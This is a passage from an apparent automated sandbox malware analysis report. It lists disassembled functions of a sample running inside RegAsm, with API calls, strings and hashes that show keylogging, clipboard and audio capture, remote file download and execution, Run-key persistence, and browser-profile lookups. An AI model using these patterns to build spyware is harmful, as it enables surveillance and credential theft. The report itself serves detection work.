                                                        • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004193E3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MetricsSystem
                                                        • String ID:
                                                        • API String ID: 4116985748-0
                                                        • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                        • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                                                        • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                        • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00438F31 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                                                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                                                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                                                          • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                                                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                        • String ID:
                                                        • API String ID: 1761009282-0
                                                        • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                        • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
                                                        • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                        • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00442C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorHandling__start
                                                        • String ID: pow
                                                        • API String ID: 3213639722-2276729525
                                                        • Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                                        • Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
                                                        • Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                                        • Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040B748 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                        • __Init_thread_footer.LIBCMT ref: 0040B797
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Init_thread_footer__onexit
                                                        • String ID: [End of clipboard]$[Text copied to clipboard]
                                                        • API String ID: 1881088180-3686566968
                                                        • Opcode ID: fb1c81892c2e036c5d6c31f086f493dd212476ae9b22afc1b3a562318c09d8ed
                                                        • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                                                        • Opcode Fuzzy Hash: fb1c81892c2e036c5d6c31f086f493dd212476ae9b22afc1b3a562318c09d8ed
                                                        • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00451B37 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ACP$OCP
                                                        • API String ID: 0-711371036
                                                        • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                                        • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                                                        • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                                        • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                        • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                                                        Strings
                                                        • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LocalTime
                                                        • String ID: KeepAlive | Enabled | Timeout:
                                                        • API String ID: 481472006-1507639952
                                                        • Opcode ID: 889eda472554f13da5ed19224a724834adbe5322b7fc00b68ad75e81c6f62207
                                                        • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
                                                        • Opcode Fuzzy Hash: 889eda472554f13da5ed19224a724834adbe5322b7fc00b68ad75e81c6f62207
                                                        • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041663B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Sleep.KERNEL32 ref: 00416640
                                                        • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DownloadFileSleep
                                                        • String ID: !D@
                                                        • API String ID: 1931167962-604454484
                                                        • Opcode ID: 07a7ba679a22719b007f27f942da87136b12813d5d7402b4186b0f1ae2008f5d
                                                        • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                                                        • Opcode Fuzzy Hash: 07a7ba679a22719b007f27f942da87136b12813d5d7402b4186b0f1ae2008f5d
                                                        • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041B4EF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LocalTime
                                                        • String ID: | $%02i:%02i:%02i:%03i
                                                        • API String ID: 481472006-2430845779
                                                        • Opcode ID: 0b58fb712609a629be2860926311a3a1d9782cd388fbf364b696734300abae58
                                                        • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                                                        • Opcode Fuzzy Hash: 0b58fb712609a629be2860926311a3a1d9782cd388fbf364b696734300abae58
                                                        • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041AD17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExistsFilePath
                                                        • String ID: alarm.wav$hYG
                                                        • API String ID: 1174141254-2782910960
                                                        • Opcode ID: 0e1c4e1224622d2e2eba9349cd815abebc3d2b7a1c969d03ea25083f5c27e476
                                                        • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
                                                        • Opcode Fuzzy Hash: 0e1c4e1224622d2e2eba9349cd815abebc3d2b7a1c969d03ea25083f5c27e476
                                                        • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040B051 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                                          • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                        • CloseHandle.KERNEL32(?), ref: 0040B0B4
                                                        • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                        • String ID: Online Keylogger Stopped
                                                        • API String ID: 1623830855-1496645233
                                                        • Opcode ID: e1143dfe4ebbdf49b26d73ef465cebd6e20b11e5a8ab35f70cc7b7b67a3e30d6
                                                        • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                                                        • Opcode Fuzzy Hash: e1143dfe4ebbdf49b26d73ef465cebd6e20b11e5a8ab35f70cc7b7b67a3e30d6
                                                        • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • waveInPrepareHeader.WINMM(?,00000020,?), ref: 00401849
                                                        • waveInAddBuffer.WINMM(?,00000020), ref: 0040185F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: wave$BufferHeaderPrepare
                                                        • String ID: XMG
                                                        • API String ID: 2315374483-813777761
                                                        • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                        • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                        • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                        • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00448AE6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LocaleValid
                                                        • String ID: IsValidLocaleName$JD
                                                        • API String ID: 1901932003-2234456777
                                                        • Opcode ID: 8ed56ec59b6d4db5e47e15cf77ebd157549768ac78bfa39ea2b76d2b56dc7c94
                                                        • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                                                        • Opcode Fuzzy Hash: 8ed56ec59b6d4db5e47e15cf77ebd157549768ac78bfa39ea2b76d2b56dc7c94
                                                        • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040C4C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExistsFilePath
                                                        • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                        • API String ID: 1174141254-4188645398
                                                        • Opcode ID: d11da1c58d5dd2ef9da09c3ea68de0927d50847f2cce6e72d2cc7c3e9ccd8b86
                                                        • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                                                        • Opcode Fuzzy Hash: d11da1c58d5dd2ef9da09c3ea68de0927d50847f2cce6e72d2cc7c3e9ccd8b86
                                                        • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040C526 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C559
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExistsFilePath
                                                        • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                        • API String ID: 1174141254-2800177040
                                                        • Opcode ID: 62d77e7710f88fd67431bbf20b3e0d601dfd53fd2a54c8c31c6ded84776c1d6f
                                                        • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                                                        • Opcode Fuzzy Hash: 62d77e7710f88fd67431bbf20b3e0d601dfd53fd2a54c8c31c6ded84776c1d6f
                                                        • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040C589 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5BC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExistsFilePath
                                                        • String ID: AppData$\Opera Software\Opera Stable\
                                                        • API String ID: 1174141254-1629609700
                                                        • Opcode ID: cbec4c721474318851a7c02d4d9936ce5133d15acec931d959add52bdfa17e90
                                                        • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                                                        • Opcode Fuzzy Hash: cbec4c721474318851a7c02d4d9936ce5133d15acec931d959add52bdfa17e90
                                                        • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040B646 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetKeyState.USER32(00000011), ref: 0040B64B
                                                          • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                                                          • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                                          • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32 ref: 0040A429
                                                          • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                                          • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                                                          • Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A461
                                                          • Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A4C1
                                                          • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                        • String ID: [AltL]$[AltR]
                                                        • API String ID: 2738857842-2658077756
                                                        • Opcode ID: 2b71d764483a078f53a432e7892b7890680e208db1d279d2457640738fc20bd0
                                                        • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                                                        • Opcode Fuzzy Hash: 2b71d764483a078f53a432e7892b7890680e208db1d279d2457640738fc20bd0
                                                        • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0044ECEC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                                        • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: uD
                                                        • API String ID: 0-2547262877
                                                        • Opcode ID: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                                        • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                                                        • Opcode Fuzzy Hash: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                                        • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041618A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExecuteShell
                                                        • String ID: !D@$open
                                                        • API String ID: 587946157-1586967515
                                                        • Opcode ID: ef1b3a0f4602e6d199ecf0e45d17a7acf077c1a045a33f1301243906c424f492
                                                        • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                                                        • Opcode Fuzzy Hash: ef1b3a0f4602e6d199ecf0e45d17a7acf077c1a045a33f1301243906c424f492
                                                        • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040B6A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetKeyState.USER32(00000012), ref: 0040B6A5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: State
                                                        • String ID: [CtrlL]$[CtrlR]
                                                        • API String ID: 1649606143-2446555240
                                                        • Opcode ID: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
                                                        • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                                                        • Opcode Fuzzy Hash: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
                                                        • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040E79F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                        • __Init_thread_footer.LIBCMT ref: 00410F29
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Init_thread_footer__onexit
                                                        • String ID: ,kG$0kG
                                                        • API String ID: 1881088180-2015055088
                                                        • Opcode ID: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                                                        • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                                                        • Opcode Fuzzy Hash: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                                                        • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00413A23 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DeleteOpenValue
                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                        • API String ID: 2654517830-1051519024
                                                        • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                        • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                                                        • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                        • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040B869 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
                                                        • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DeleteDirectoryFileRemove
                                                        • String ID: pth_unenc
                                                        • API String ID: 3325800564-4028850238
                                                        • Opcode ID: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                                                        • Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
                                                        • Opcode Fuzzy Hash: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                                                        • Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00412850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                        • WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ObjectProcessSingleTerminateWait
                                                        • String ID: pth_unenc
                                                        • API String ID: 1872346434-4028850238
